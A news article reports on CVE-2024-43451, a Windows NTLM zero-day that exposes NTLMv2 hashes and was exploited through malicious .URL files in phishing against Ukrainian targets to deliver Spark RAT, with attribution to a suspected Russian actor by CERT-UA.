A newly discovered security vulnerability in Windows NT LAN Manager (NTLM) has been exploited in a zero-day attack, with suspected ties to Russian threat actors targeting Ukraine. This vulnerability, designated as CVE-2024-43451 and rated with a CVSS score of 6.5, allows attackers to possibly expose a user’s NTLMv2 hash. Microsoft addressed this security flaw with a patch earlier this week.
The advisory from Microsoft indicates that the vulnerability can be activated with minimal user interaction, such as merely selecting or inspecting a malicious file. Such ease of exploitation underscores the critical nature of user awareness in cybersecurity defenses.
ClearSky, an Israeli cybersecurity firm, identified exploitation of this zero-day vulnerability as early as June 2024. They noted that it has been leveraged as part of a broader attack chain deploying the open-source Spark RAT malware. ClearSky detailed that the flaw facilitates malicious actions through URL files hosted on an official Ukrainian government website, where users are misled into downloading academic certificates.
Phishing emails from a compromised Ukrainian government server prompt recipients to follow a malicious URL to renew their academic credentials. This results in the download of a ZIP file containing an internet shortcut file (.URL). The exploitation occurs when a user interacts with this URL file in specific ways, such as right-clicking or moving it between folders.
This malicious URL file establishes connections with external servers to retrieve additional payloads, including the Spark RAT. ClearSky also reported alerts indicating attempts to exploit NTLM hashes through the SMB protocol. Such an attack method would allow an adversary to conduct a Pass-the-Hash attack, enabling them to authenticate as the user linked to the compromised hash without requiring a password.
Ukraine’s Computer Emergency Response Team (CERT-UA) has attributed these incidents to a likely Russian actor tracked as UAC-0194. This organization has recently raised alarms regarding phishing campaigns that employ tax-related schemes to propagate legitimate remote desktop software known as LiteManager, highlighting a financially motivated threat landscape.
CERT-UA has warned that businesses with employees managing remote banking systems are particularly vulnerable, citing investigations that show rapid progression from initial compromise to significant financial theft. The swift nature of these attacks emphasizes the ongoing need for robust cybersecurity measures, especially in a high-stakes environment shaped by geopolitical tensions.
